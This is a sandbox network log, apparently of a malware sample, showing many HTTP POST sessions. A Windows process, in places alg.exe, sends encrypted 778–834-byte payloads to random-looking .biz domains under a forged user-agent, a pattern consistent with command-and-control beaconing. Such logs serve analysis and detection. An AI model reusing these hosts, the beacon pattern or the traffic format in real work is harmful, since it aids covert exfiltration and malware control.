                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: fwiwk.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
Nov 18, 2024 09:59:01.401746988 CET | 834 | OUT | Data Raw: 4c 84 54 6b c3 4f 9f c5 36 03 00 00 19 6f dd 62 24 be c9 f4 f8 20 8f 21 5f ff f5 58 3c 66 0a a2 19 71 5b 7b 82 9b ff de e8 c0 74 ef 2e 05 ca 30 db 23 0a d1 fd a8 2e 73 3a 70 8d 04 eb 21 89 92 1d 0b e8 04 f9 e2 d8 79 05 52 4b 59 6f c5 2c aa 47 47
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: LTkO6ob$ !_X<fq[{t.0#.s:p!yRKYo,GG>.)ur2x|j`\TR'Zh/*`VT6&(^gO[c0Yl-B(Emla`bymG"@<_kpdCjH(*>


Session ID | Source IP | Source Port | Destination IP | Destination Port
75 | 192.168.2.10 | 50054 | 172.234.222.138 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:02.076596022 CET | 356 | OUT | POST /svctwhlwhnodkjc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: fwiwk.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
Nov 18, 2024 09:59:02.076596022 CET | 834 | OUT | Data Raw: de 15 c7 9e 85 fa ce ac 36 03 00 00 64 68 9f 9d 43 b3 20 d3 87 d4 ec 86 8f 5b 1a 0c 6a 5d b9 e0 4b 87 d5 32 f0 25 e7 16 47 56 b7 38 81 17 e0 88 b1 f1 91 b9 92 f5 3b da ce 4b 3e 41 09 85 e6 72 c8 19 7f d6 03 63 91 fd c5 f3 fc 45 ea 07 c4 c9 01 b5
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 6dhC [j]K2%GV8;K>ArcE=5F:7<1),D@nyg~)hcA<Q%RjQ8S99'~g]&faX?4r{T6>9eEy9kzS8F^P+Ukhv


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
76 | 192.168.2.10 | 50055 | 47.129.31.212 | 80 | 7888 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:02.392772913 CET | 354 | OUT | POST /srarrsentbxw HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: mnjmhp.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:59:02.392791033 CET | 778 | OUT | Data Raw: 59 89 de a3 bd 23 06 8b fe 02 00 00 23 b4 0f 28 ce 9a 34 c8 42 6a df 3c 8b ac 15 f1 ff 9f 19 e0 8a ef 6b 82 43 f8 76 cd 16 ed c5 e9 dc 7e 55 5b ed 36 62 34 d2 fd 00 d6 c3 08 99 78 cf 4b bf 30 4e b2 5c e4 8c 00 53 fe ec ec 9b 26 3a cf 73 c5 7c dc
Data Ascii: Y##(4Bj<kCv~U[6b4xK0N\S&:s|{><7(Z\[| 3mz_Sn_9Sgm=4?& DbezAz0.Esk_awEVN><^9!wEu/Y)?VIs
Nov 18, 2024 09:59:03.860630035 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:59:03 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=2e70a01800db4b10a1c2eff11955825b|155.94.241.187|1731920343|1731920343|0|1|0; path=/; domain=.mnjmhp.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
77 | 192.168.2.10 | 50056 | 34.246.200.160 | 80

Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:02.769539118 CET | 345 | OUT | POST /yaj HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: tbjrpv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 18, 2024 09:59:02.769539118 CET | 834 | OUT | Data Raw: a2 71 f5 c7 a6 b9 5c 0e 36 03 00 00 1a 99 38 8a b5 ab 52 dd 9b ca 3a 70 58 65 0f 65 0c 65 4d 35 e2 25 88 56 2c ac c9 03 43 25 8f 48 b8 2c 26 58 40 ab b2 b5 e8 8f 97 4f 15 ac fb 0b 36 0c fa 24 9a 86 dd d8 da b4 a2 51 f5 09 8a b7 98 d4 67 d3 9a 76
Data Ascii: q\68R:pXeeeM5%V,C%H,&X@O6$QgvpUc4NqwA4&4h~J4gU]WMC9-%g]]ijr"f7/}>D z#4L7f}=TFgAY$x#9Mi,HR
Nov 18, 2024 09:59:03.732074976 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:59:03 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=bdfbd1b77eb9541493a380400a844b06|155.94.241.187|1731920343|1731920343|0|1|0; path=/; domain=.tbjrpv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
78 | 192.168.2.10 | 50057 | 18.208.156.248 | 80 | 7888 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:04.135345936 CET | 350 | OUT | POST /ubnpo HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: opowhhece.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:59:04.135529041 CET | 778 | OUT | Data Raw: a5 5b 69 9b 23 a3 8b 8b fe 02 00 00 34 0d e9 b1 48 65 eb 8b 60 16 2c ab 27 53 0c e8 95 68 38 23 83 8e b8 48 7f 21 d0 fa cf 57 5c c2 43 9c 23 31 0f 99 20 f2 cd 3e 79 26 84 ed ad 12 ab a9 cf 8e 98 3d 32 49 1e 4d c9 e2 00 84 26 4f 28 c6 1f db af 92
Data Ascii: [i#4He`,'Sh8#H!W\C#1 >y&=2IM&O(>F3=$S 'i{R3Z[okFmpAv`~~e9]sb)4G*+n,6h>jWbbw/\<(/LB
Nov 18, 2024 09:59:04.826997042 CET | 417 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:59:04 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=ea1417230fbd160ddb957ff51ab9a89c|155.94.241.187|1731920344|1731920344|0|1|0; path=/; domain=.opowhhece.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
79 | 192.168.2.10 | 50058 | 18.208.156.248 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:04.527333975 CET | 346 | OUT | POST /dddgg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: deoci.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
Nov 18, 2024 09:59:04.527333975 CET | 834 | OUT | Data Raw: 29 a6 d3 0b 18 06 69 6e 36 03 00 00 53 1f 15 32 78 ce 6d 8e a7 1c 4a f8 65 40 af 18 f6 14 1f 73 34 ba 48 ec 1c c9 97 00 21 56 03 a3 7d 2a e8 2a d6 6c 85 16 52 78 63 48 5c e9 7b 4e b2 d0 13 3e 56 41 70 0e 3b be c3 4a 46 3a 75 c1 72 d3 9a b4 48 be
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: )in6S2xmJe@s4H!V}**lRxcH\{N>VAp;JF:urHKCPy}zjgcv1)yAJe`rulY@zZeD?OB8I)r MVw[{Jf(5 *?srj_r71l*Wa
Nov 18, 2024 09:59:05.179490089 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:05 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=dc332423ab46bb20357637da9a10aa57|155.94.241.187|1731920345|1731920345|0|1|0; path=/; domain=.deoci.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
80 | 192.168.2.10 | 50059 | 208.100.26.245 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:05.201328993 CET | 356 | OUT | POST /ndwuuvykmbmq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: gytujflc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
Nov 18, 2024 09:59:05.201349020 CET | 834 | OUT | Data Raw: bb 37 47 3d da b0 98 56 36 03 00 00 80 88 6d 69 62 ce 76 91 31 ec cf 6b 0d 39 fe 18 3e df 9c b2 b2 46 09 87 66 17 ed 82 56 c9 18 83 1b 52 c4 65 5a e8 5c 2d 8b c1 9f 36 7e d4 91 13 7a 3c 48 00 fc b9 09 4f 58 45 a8 d1 57 3e eb 21 d5 38 7c 29 e5 e2
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 7G=V6mibv1k9>FfVReZ\-6~z<HOXEW>!8|)CTvu.l9J<UuuR/"!39D_:-5(PP;8#4eQLS~!9FkbcRs5[W/\|<(KP"95DR^$^YK8b4K~%
Nov 18, 2024 09:59:05.836673975 CET | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:05 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 18, 2024 09:59:05.842828035 CET | 354 | OUT | POST /xfffiesfse HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: gytujflc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
Nov 18, 2024 09:59:05.842861891 CET | 834 | OUT | Data Raw: 19 02 37 7b f3 ef 3f 31 36 03 00 00 34 35 89 02 69 26 06 cc 96 0d 93 64 4a ec 7c 2a c8 c9 02 d0 f5 66 4a 16 0c 01 f6 c4 86 5c 29 0a 1a f6 f3 fa 8b be a9 da 6e e6 f8 71 c9 e7 1d 3a 7c 4a 2e 80 45 f7 fe ac 55 bc 44 03 e3 1e de f4 41 45 61 f5 41 a3
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 7{?1645i&dJ|*fJ\)nq:|J.EUDAEaAD!3N54wF&X(/n!]%d(<gA=h0nBb=mfb7f(<CLRe4)|wgp;y)~ys{=YL|y-K|-c9
Nov 18, 2024 09:59:05.988284111 CET | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:05 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 18, 2024 09:59:13.293462038 CET | 351 | OUT | POST /piudubsi HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: yunalwv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
Nov 18, 2024 09:59:13.293612003 CET  834  OUT  Data Raw: f8 9c 5a 8b 65 81 62 92 36 03 00 00 63 d2 ee 6b c9 22 05 dd 56 8c 46 19 00 18 4b 7f 64 ca a4 99 52 4b 6c 91 8f d3 e4 9a 4a b6 38 48 b3 af c1 2c 49 86 f3 b3 bd 38 12 9b ad d3 22 8a 71 73 2c b5 5b fb c1 9b e8 7b f6 b4 88 02 35 aa f5 21 b6 47 ca b1
Nov 18, 2024 09:59:13.439344883 CET  744  IN  HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:13 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 18, 2024 09:59:13.548918962 CET  353  OUT  POST /twarfxyjhx HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: yunalwv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
Nov 18, 2024 09:59:13.548950911 CET  834  OUT  Data Raw: 29 32 d8 15 80 c7 8f cf 36 03 00 00 cc fb 50 55 94 fd aa c2 e3 37 6d 8a fb 9f 94 25 9f 13 3f 43 8d 86 f8 2d 03 a2 73 ad 82 e6 3f 84 8e ef e8 42 d5 91 c3 58 46 a5 a5 bf 30 f2 f9 24 1a a9 8a 08 5b d2 22 b5 49 77 d4 36 81 55 0c cd 51 da fb dc 24 78
Nov 18, 2024 09:59:13.695333004 CET  744  IN  HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:13 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 18, 2024 09:59:13.946777105 CET  744  IN  HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:13 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 18, 2024 09:59:56.009902000 CET  352  OUT  POST /iwsqruc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: gjogvvpsf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
Nov 18, 2024 09:59:56.009916067 CET  834  OUT  Data Raw: e6 f1 2f 07 b6 37 7c 02 36 03 00 00 50 0c 42 e7 02 9b e4 60 59 31 bb e5 6d 00 9e 72 68 20 b1 1c 18 dd 64 3c c5 70 c7 f1 a7 2d aa b1 f3 cb b8 29 4a a7 2f bc f8 11 de 05 c4 64 3e 0a 59 51 82 a7 a1 ed 40 0f 21 6b 32 57 5a 29 16 20 dc 18 f1 95 c3 35
Nov 18, 2024 09:59:56.164326906 CET  744  IN  HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:56 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 18, 2024 09:59:56.177228928 CET | 349 | OUT | POST /qdah HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gjogvvpsf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 18, 2024 09:59:56.180711985 CET | 834 | OUT | Data Raw: 17 87 ad 91 d0 7c aa 3f 36 03 00 00 02 d8 d2 70 5b d3 ca 28 71 41 49 85 10 b0 da 59 b0 a2 4c 30 9c 98 62 5c 2b 85 be 04 d0 4c ec 59 91 98 6d fb a0 a3 44 88 20 64 28 ca ea ce 4f d6 3c 6b 2a cc f1 bc b1 cd 00 02 d9 9a de ba e0 f5 45 56 63 35 32 2e
Data Ascii: |?6p[(qAIYL0b\+LYmD d(O<k*EVc52.y?9@g &!A|CnuN~6,(M&?GH05`MirI+lJ&5|U\fmC+?Q`w.IoDL}p/dHI,29G1OHP&~BY
Nov 18, 2024 09:59:56.325150967 CET | 744 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Mon, 18 Nov 2024 08:59:56 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
81 | 192.168.2.10 | 50060 | 13.251.16.150 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:05.275382042 CET | 351 | OUT | POST /ekicmdatg HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jdhhbs.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:59:05.275382042 CET | 778 | OUT | Data Raw: 7e be f2 6b f4 ec f6 f0 fe 02 00 00 9b ea c3 52 09 3c 1d 69 f7 26 21 2b a1 c1 50 90 bd b5 36 c1 04 75 7a 67 b6 59 5c c8 ab ae eb fe fe 6b 32 8c a2 06 aa c6 ee 53 90 f1 30 61 ea 4f b2 03 a6 c4 5c 66 a5 5a 0f 42 30 cf ab 38 ad 9e bb d9 32 3b 71 05
Data Ascii: ~kR<i&!+P6uzgY\k2S0aO\fZB082;q;XP51Af'Q~{)a4l54@}`9,PJlloTkRpzZS*`{^NkZP;W~X{2"Pi%H-iQEIH
Nov 18, 2024 09:59:06.732729912 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:59:06 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=7a320d3f97536e29360778a08eb1752b|155.94.241.187|1731920346|1731920346|0|1|0; path=/; domain=.jdhhbs.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
82 | 192.168.2.10 | 50061 | 13.251.16.150 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:06.026982069 CET | 350 | OUT | POST /glmweuqq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: qaynky.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 18, 2024 09:59:06.026982069 CET | 834 | OUT | Data Raw: 4b 98 b5 05 0e 35 6d 6e 36 03 00 00 80 cb a5 66 05 6c 8e 3b 00 74 bf 8f 7f f0 19 bb 19 99 9d fc a8 dc bf 4c 28 64 46 d9 4f d3 1a 3a a6 80 bd 2b 16 2f bc 03 32 9d ae 98 8a 4a 0b e1 16 2f 95 da 3b d9 69 36 e2 f0 8f de 9e 53 1e f1 1d 58 11 6d 60 d0
Data Ascii: K5mn6fl;tL(dFO:+/2J/;i6SXm`)Or5.{atPCJclW4Z"VxV_a8GvA*qRBYZPq<p7{_"o1{&C16\9Ts}Y!7{$>\'9K
Nov 18, 2024 09:59:07.476030111 CET | 414 | IN | HTTP/1.1 200 OK
